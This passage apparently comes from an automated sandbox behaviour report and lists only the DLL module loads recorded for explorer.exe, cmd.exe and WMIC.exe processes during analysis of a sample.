Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
